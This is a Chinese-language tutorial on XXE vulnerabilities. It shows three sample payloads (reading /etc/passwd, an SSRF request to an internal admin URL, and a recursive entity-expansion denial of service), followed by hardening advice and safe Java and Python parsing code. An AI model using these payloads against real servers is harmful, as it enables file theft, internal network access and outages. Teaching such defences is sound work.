XXE 漏洞介绍
XXE (XML External Entity) 是一种针对 XML 解析器的漏洞,攻击者可以利用它读取服务器上的文件、发起 SSRF 攻击或导致拒绝服务(DoS)。XXE 漏洞通常发生在应用程序解析用户提供的 XML 数据时,未禁用外部实体引用。
漏洞原理
XXE 漏洞的根源在于 XML 解析器允许加载外部实体。攻击者可以通过构造恶意 XML 数据,利用 DOCTYPE 或 ENTITY 标签引用外部资源,例如:
- 读取服务器上的文件。
- 发起网络请求(SSRF)。
- 导致解析器崩溃(DoS)。
XXE 漏洞示例
示例 1:读取服务器文件
假设一个应用接受 XML 数据并解析:
<?xml version="1.0" encoding="UTF-8"?>
<user><name>John</name>
</user>
攻击者构造恶意 XML,读取服务器上的 /etc/passwd 文件:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user><name>&xxe;</name>
</user>
服务器解析 XML 时,会将 /etc/passwd 文件内容插入 <name> 标签。
示例 2:发起 SSRF 攻击
攻击者利用 XXE 发起 SSRF 请求:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-service/admin">
]>
<user><name>&xxe;</name>
</user>
服务器解析 XML 时,会向 http://internal-service/admin 发起请求。
示例 3:导致拒绝服务 (DoS)
攻击者利用 XXE 构造恶意实体,导致解析器崩溃:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe "xxe"><!ENTITY xxe1 "&xxe;&xxe;&xxe;&xxe;&xxe;"><!ENTITY xxe2 "&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;"><!ENTITY xxe3 "&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;">
]>
<user><name>&xxe3;</name>
</user>
解析器会递归扩展实体,导致内存耗尽或崩溃。
解决方法
-
禁用外部实体
- 在 XML 解析器中禁用外部实体加载。
- 示例(Java):
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false); factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
-
使用安全的 XML 解析器
- 使用默认禁用外部实体的解析器,如 Python 的
defusedxml库。
- 使用默认禁用外部实体的解析器,如 Python 的
-
验证和过滤用户输入
- 对用户提供的 XML 数据进行严格验证,禁止包含
DOCTYPE或ENTITY标签。
- 对用户提供的 XML 数据进行严格验证,禁止包含
-
使用 JSON 替代 XML
- 如果可能,使用 JSON 替代 XML,因为 JSON 不支持外部实体。
-
限制文件访问
- 确保 XML 解析器无法访问敏感文件或网络资源。
-
启用日志监控
- 记录所有 XML 解析请求,监控异常行为。
示例安全代码
Java
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Document;public class SafeXMLParser {public static void main(String[] args) throws Exception {DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setFeature("http://xml.org/sax/features/external-general-entities", false);factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);DocumentBuilder builder = factory.newDocumentBuilder();Document document = builder.parse("input.xml");System.out.println(document.getDocumentElement().getTextContent());}
}
Python
from defusedxml.ElementTree import parsedef safe_xml_parser(file_path):tree = parse(file_path)root = tree.getroot()print(root.text)safe_xml_parser("input.xml")
总结
XXE 漏洞的危害性较大,可能导致文件读取、SSRF 攻击或拒绝服务。通过禁用外部实体、使用安全的 XML 解析器、验证用户输入等方法,可以有效防止 XXE 漏洞。同时,结合日志监控和文件访问限制,可以进一步增强安全性。
